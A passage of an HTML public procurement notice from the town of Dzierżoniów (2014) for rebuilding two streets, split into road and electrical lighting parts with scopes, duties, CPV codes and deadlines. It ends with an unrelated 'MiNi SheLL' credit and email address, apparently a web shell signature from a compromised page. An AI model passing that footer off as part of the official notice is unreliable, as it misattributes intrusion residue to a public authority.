b) materiały budowlane przewidziane w umowie do wykonania zamówienia nie mogą być użyte przy realizacji inwestycji z powodu zaprzestania ich produkcji lub konieczności zastąpienia innymi;
c) w trakcie wykonywania zamówienia nastąpiła zmiana przepisów prawa budowlanego;
d) w trakcie wykonywania zamówienia nastąpiła zmiana przepisów prawa mająca wpływ na opisany przedmiot zamówienia.

	O wystąpieniu okoliczności mogących wpłynąć na zmianę terminu lub wynagrodzenia Wykonawca winien jest poinformować Zamawiającego. 
Strony z powodów, jakie mogą wpływać na zmianę terminu wykonania robót, wyłączają niedogodności związane z pogodą, typową dla okresu wykonywania robót w miejscu budowy.

3). W przypadku wystąpienia z wnioskiem Wykonawcy w sprawie zlecenia części robót w ramach podwykonawstwa, gdy nie były one określone w Jego ofercie, w tym zakresie wymagana jest zgoda Zamawiającego zgodnie z zapisami projektu umowy. Wprowadzenie podwykonawcy nie ma wpływu na zmianę terminu i wynagrodzenia wykonawcy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.um.dzierzoniow.pl/#Z2V0Q29udGVudHMoOTYyOSwxLDAp<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zamawiającego..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.08.2014 godzina 10:00, miejsce: Urząd Miasta Dzierżoniów, ul Rynek 1, Biuro Obsługi Klienta, stanowisko A - Informacja..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Wykonanie robót budowlanych w branży drogowej, związanych z realizacją zadania pn.: Przebudowa          ul. Bielawskiej i ul. Batalionów Chłopskich (droga nr 384) od ronda Żołnierzy Wyklętych do mostu w m.Dzierżoniów..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1) KRÓTKI OPIS ZE WSKAZANIEM WIELKOŚCI LUB ZAKRESU ZAMÓWIENIA
1)	Przedmiot zamówienia obejmuje następujące roboty: 
a.	Wykonanie przebudowy odcinka drogi na długości 669,5m w tym na odcinku 349m przewidziano całkowitą wymianę konstrukcji, natomiast na pozostałym odcinku 320,5m przewidziano zastosowanie technologii MCE,
b.	Ułożenie na całym odcinku przebudowywanych ulic warstwy ścieralnej z masy mineralno-asfaltowej SMA 0/11 mm gr. 4cm
c.	Wymianę krawężników na nowe betonowe 20x30cm,
d.	Wymianę obrzeży chodnikowych,
e.	 Wykonanie wysp rozdzielających w ciągu przebudowywanej ulicy,
f.	Wykonanie nowej konstrukcji i nawierzchni chodników i ścieżki rowerowej wraz  z montażem balustrad wzdłuż chodnika,
g.	Dostosowanie istniejących zjazdów do nowego poziomu jezdni,
h.	Odtworzenie terenów zielonych wraz z usunięciem kolidującego drzewostanu i nasadzeń zielonych (żywopłotu),
i.	Wprowadzenie czasowej i stałej organizacji ruchu.

W branży instalacyjnej:
a.	Wymianę istniejących wpustów deszczowych na nowe,
b.	Dobudowanie nowego odcinka odwodnienia liniowego,
c.	Montaż nowych pierścieni fundamentowych i płyt odciążających na wszystkich studniach deszczowych i sanitarnych wraz z wymianą włazów na nowe,
d.	Odtworzenie zagruzowanych i zniszczonych wpustów deszczowych.

2)	Wykonawca, oprócz obowiązków wynikających z ust. 1, zobowiązuje się do:
1)	przejęcia terenu budowy, jego zabezpieczenia i należytego utrzymania, 
2)	zapewnienia dojść i dojazdów do posesji zlokalizowanych w obrębie inwestycji,
3)	organizacji zaplecza budowy oraz pomieszczeń socjalno-sanitarnych dla pracowników,
4)	udostępnienia terenu budowy dla wykonawcy robót elektrycznych i właścicieli sieci, celem realizacji przez nich robót w zakresie uzbrojenia terenu dotyczącego ich sieci, planowana jest m.in. wymiana sieci wodociągowej, gazowej i cieplnej,
5)	wystąpienia do gestorów sieci o protokolarne przekazanie urządzeń na czas prowadzenia robót, a po zakończeniu prac protokolarne przekazanie ich właścicielom,
6)	zapewnienia dostawy niezbędnych mediów do realizacji robót i opłatę za ich dostawę,
7)	wyczyszczenia nawierzchni przyległych dróg w przypadku nawożenia błota z terenu budowy na kołach maszyn, samochodów i innych urządzeń technicznych,
8)	uporządkowania terenu budowy i terenu przyległego po zakończeniu robót,
9)	wywozu materiału i gruzu z rozbiórki na składowisko odpadów,
10)	oczyszczenie i przekazanie Zamawiającemu kostki kamiennej pochodzącej z rozbiórki wraz przetransportowaniem jej w miejsce wskazane przez zamawiającego na terenie miasta Dzierżoniowa,  
11)	wywozu pochodzących z rozbiórki mas mineralno-bitumicznych i ich utylizacji,
12)	obsługi geodezyjnej w trakcie realizacji robót budowlanych, jak i do wykonania pomiaru geodezyjnego powykonawczego dostarczonego również w formie elektronicznej na CD (skan sekcji mapy rozdzielczej 300DPJ i formacie TIF), 
13)	realizacji i poniesienia wszelkich kosztów związanych z wypełnieniem wszystkich zobowiązań wynikających z decyzji, uzgodnień,
14)	wykonania badań i pomiarów w czasie wykonywania robót budowlanych oraz badań odbiorczych zgodnie ze specyfikacją techniczną wykonania i odbioru robót budowlanych,
15)	wykonania Planu Bezpieczeństwa i Ochrony Zdrowia,
16)	przedłożenia Zamawiającemu w dniu podpisania umowy oświadczenia, że będzie prowadził ewidencję wytwarzanych odpadów i będzie gospodarował nimi zgodnie       z ustawą o odpadach D.U z 2013 poz. 21 z póź. zm. 
17)	 dostarczenia Zamawiającemu oświadczenia kierownika budowy o przeszkoleniu w zakresie BHP na stanowisku pracy pracowników zatrudnionych przy wykonywaniu robót związanych z realizacją przedmiotowego zamówienia w terminie 30 dni od daty przekazania placu budowy,
18)	dostarczenia, przed wbudowaniem, recepty na masę celem jej zatwierdzenia przez Zamawiającego; w przypadku wbudowania materiału bez stosownej akceptacji, Zamawiający nie dokona zapłaty za jej wbudowanie,
19)	przekazania Zamawiającemu oświadczeń o podjęciu obowiązków przez kierownika budowy i kierownika robót sanitarnych w terminie 3 dni od daty podpisania umowy, 
20)	uczestnictwa kierownika budowy w cotygodniowych radach budowy, na których m.in. będzie kontrolowane stosowanie wymogów związanych z ochroną środowiska i BHP; informacyjnie podaje się, że Urząd wdrożył normę m.in. środowiskową PN-EN-ISO 14001:2005 oraz  BHP PN-N-18001:2004.  

3) Terminy i wartości wykonania przedmiotu zamówienia, tj. poszczególnych kategorii robót, wynikać będą z harmonogramu rzeczowo-finansowego realizacji robót budowlanych zatwierdzonego przez Zamawiającego. Harmonogram, z podziałem na etapy, należy wykonać zgodnie z zapisami §4 ust. 2 w ramach poszczególnych kategorii robót oraz przedłożyć Zamawiającemu nie później niż w ciągu 10 dni od dnia podpisania umowy. Harmonogram podlega zatwierdzeniu przez Zamawiającego. Zamawiający ma prawo zakwestionować wartość poszczególnych kategorii robót w przypadku, gdy w sposób rażący będzie naruszona proporcja pomiędzy nimi. W takiej sytuacji Zamawiający odmówi zatwierdzenia harmonogramu. W przypadku wystąpienia powyższej sytuacji oraz innych błędów w harmonogramie Wykonawca zobowiązany jest do ich poprawienia w terminie 3 dni od wezwania Zamawiającego. Cena ryczałtowa brutto przedmiotu zamówienia nie może ulec zmianie.   

4) Wykonawca w przedmiotowym harmonogramie wskaże wartość do wykonania w 2014r. robót budowlanych na kwotę nie większą niż 1 500 000,00 zł brutto. Zmiana tej wartości może nastąpić po uzgodnieniu z Zamawiającym.

5) W przypadku, gdy w projektach budowlanych i wykonawczych oraz specyfikacjach technicznych wykonania i odbioru robót budowlanych zostało wskazane pochodzenie (marka, znak towarowy, producent, dostawca) Zamawiający dopuszcza oferowanie materiałów i urządzeń równoważnych, pod warunkiem, że zagwarantują one realizację robót w zgodzie z Prawem budowlanym i odpowiednimi normami, zapewnią uzyskanie parametrów technicznych nie gorszych od założonych w w/w dokumentacji oraz zostaną one wcześniej zaakceptowane przez Zamawiającego. Zamawiający dopuszcza możliwość wykonania przedmiotu zamówienia z innymi materiałami i urządzeniami równoważnymi, a za ofertę równoważną Zamawiający uzna przyjęcie parametrów technicznych pod warunkiem, że materiały i urządzenia oferowane przez Wykonawcę jako równoważne spełnią wymagania określone przez Zamawiającego w SIWZ, projektach budowlanych i wykonawczych oraz specyfikacjach  technicznych wykonania i odbioru robót budowlanych. Zamawiający informuje, że podane w projektach budowlanych konkretne propozycje materiałów i urządzeń mają na celu wyłącznie określenie standardu wykonania lub przyjętego rozwiązania i mogą być zastąpione rozwiązaniami równoważnymi nie powodującymi zmiany ilości i jakości wyspecyfikowanych urządzeń i materiałów. Zamawiający dopuszcza rozwiązania równoważne, ale na podstawie art. 30 ust. 5 ustawy  to na Wykonawcy spoczywa obowiązek wykazania na etapie składania ofert, że oferowane przez niego materiały i urządzenia spełniają wymagania określone przez Zamawiającego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.20-6, 45.23.24.00-6, 45.22.20.00-9, 45.11.10.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Wykonanie robót budowlanych w branży elektrycznej, związanych z realizacją zadania pn.: Przebudowa ul. Bielawskiej i ul. Batalionów Chłopskich (droga nr 384) od ronda Żołnierzy Wyklętych do mostu w m. Dzierżoniów..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1)	Przedmiot zamówienia obejmuje następujące roboty: 
a.	Demontaż istniejących słupów oświetlenia wraz z oprawami,
b.	Dostawę i montaż nowych słupów oświetleniowych aluminiowych wraz             z wysięgnikami i oprawami ze źródłami światła typu LED wzdłuż jezdni i na przejściach dla pieszych,
c.	Dostawa i montaż kompletnej szafki oświetlenia ulicznego,
d.	Ułożenie nowego doziemnego kabla zasilającego przebudowane oświetlenie uliczne,
e.	Przełożenie kolidujących odcinków sieci energetycznej,
f.	Montaż rur osłonowych na sieci energetycznej.

2)	Wykonawca, oprócz obowiązków wynikających z ust. 1, zobowiązuje się do:
1)	przejęcia terenu budowy, jego zabezpieczenia i należytego utrzymania, 
2)	zapewnienia dojść i dojazdów do posesji zlokalizowanych w obrębie inwestycji,
3)	organizacji zaplecza budowy oraz pomieszczeń socjalno-sanitarnych dla pracowników,
4)	zapewnienia dostawy niezbędnych mediów do realizacji robót i opłatę za ich dostawę,
5)	wyczyszczenia nawierzchni przyległych dróg w przypadku nawożenia błota z terenu budowy na kołach maszyn, samochodów i innych urządzeń technicznych,
6)	uporządkowania terenu budowy i terenu przyległego po zakończeniu robót,
7)	wywozu materiału i gruzu z rozbiórki na składowisko odpadów,
8)	wywozu pochodzących z rozbiórki mas mineralno-bitumicznych i ich utylizacji,
9)	obsługi geodezyjnej w trakcie realizacji robót budowlanych, jak i do wykonania pomiaru geodezyjnego powykonawczego dostarczonego również w formie elektronicznej na CD (skan sekcji mapy rozdzielczej 300DPJ i formacie TIF), 
10)	realizacji i poniesienia wszelkich kosztów związanych z wypełnieniem wszystkich zobowiązań wynikających z decyzji, uzgodnień,
11)	wykonania badań i pomiarów w czasie wykonywania robót budowlanych oraz badań odbiorczych zgodnie ze specyfikacją techniczną wykonania i odbioru robót budowlanych,
12)	przekazania Zamawiającemu zdemontowanych opraw oświetlenia drogowego oraz słupów oświetleniowych wraz z przetransportowaniem ich w miejsce wskazane przez zamawiającego na terenie miasta Dzierżoniowa.  
13)	wykonania Planu Bezpieczeństwa i Ochrony Zdrowia,
14)	przedłożenia Zamawiającemu w dniu podpisania umowy oświadczenia, że będzie prowadził ewidencję wytwarzanych odpadów i będzie gospodarował nimi zgodnie       z ustawą o odpadach D.U z 2013 poz. 21 z póź. zm. 
15)	 dostarczenia Zamawiającemu oświadczenia kierownika budowy o przeszkoleniu  w zakresie BHP na stanowisku pracy pracowników zatrudnionych przy wykonywaniu robót związanych z realizacją przedmiotowego zamówienia w terminie 30 dni od daty przekazania placu budowy,
16)	przekazania Zamawiającemu oświadczeń o podjęciu obowiązków przez kierownika budowy w terminie 3 dni od daty podpisania umowy, 
17)	uczestnictwa kierownika budowy w cotygodniowych radach budowy, na których m.in. będzie kontrolowane stosowanie wymogów związanych z ochroną środowiska i BHP; informacyjnie podaje się, że Urząd wdrożył normę m.in. środowiskową PN-EN-ISO 14001:2005 oraz  BHP PN-N-18001:2004.  

3) Terminy i wartości wykonania przedmiotu zamówienia, tj. poszczególnych kategorii robót, wynikać będą z harmonogramu rzeczowo-finansowego realizacji robót budowlanych zatwierdzonego przez Zamawiającego. Harmonogram, z podziałem na etapy, należy wykonać zgodnie z zapisami §4 ust. 2 w ramach poszczególnych kategorii robót oraz przedłożyć Zamawiającemu nie później niż w ciągu 10 dni od dnia podpisania umowy. Harmonogram podlega zatwierdzeniu przez Zamawiającego. Zamawiający ma prawo zakwestionować wartość poszczególnych kategorii robót w przypadku, gdy w sposób rażący będzie naruszona proporcja pomiędzy nimi. W takiej sytuacji Zamawiający odmówi zatwierdzenia harmonogramu. W przypadku wystąpienia powyższej sytuacji oraz innych błędów w harmonogramie Wykonawca zobowiązany jest do ich poprawienia w terminie 3 dni od wezwania Zamawiającego. Cena ryczałtowa brutto przedmiotu zamówienia nie może ulec zmianie.   

4) Wykonawca w przedmiotowym harmonogramie wskaże wartość do wykonania w 2014r. robót budowlanych na kwotę nie większą niż 100 000,00 zł brutto. Zmiana tej wartości może nastąpić po uzgodnieniu z Zamawiającym.

5) W przypadku, gdy w projektach budowlanych i wykonawczych oraz specyfikacjach technicznych wykonania i odbioru robót budowlanych zostało wskazane pochodzenie (marka, znak towarowy, producent, dostawca) Zamawiający dopuszcza oferowanie materiałów i urządzeń równoważnych, pod warunkiem, że zagwarantują one realizację robót w zgodzie z Prawem budowlanym i odpowiednimi normami, zapewnią uzyskanie parametrów technicznych nie gorszych od założonych w w/w dokumentacji oraz zostaną one wcześniej zaakceptowane przez Zamawiającego. Zamawiający dopuszcza możliwość wykonania przedmiotu zamówienia z innymi materiałami i urządzeniami równoważnymi, a za ofertę równoważną Zamawiający uzna przyjęcie parametrów technicznych pod warunkiem, że materiały i urządzenia oferowane przez Wykonawcę jako równoważne spełnią wymagania określone przez Zamawiającego w SIWZ, projektach budowlanych i wykonawczych oraz specyfikacjach  technicznych wykonania i odbioru robót budowlanych. Zamawiający informuje, że podane w projektach budowlanych konkretne propozycje materiałów i urządzeń mają na celu wyłącznie określenie standardu wykonania lub przyjętego rozwiązania i mogą być zastąpione rozwiązaniami równoważnymi nie powodującymi zmiany ilości i jakości wyspecyfikowanych urządzeń i materiałów. Zamawiający dopuszcza rozwiązania równoważne, ale na podstawie art. 30 ust. 5 ustawy  to na Wykonawcy spoczywa obowiązek wykazania na etapie składania ofert, że oferowane przez niego materiały i urządzenia spełniają wymagania określone przez Zamawiającego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.20-6, 45.23.14.00-9, 45.11.10.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com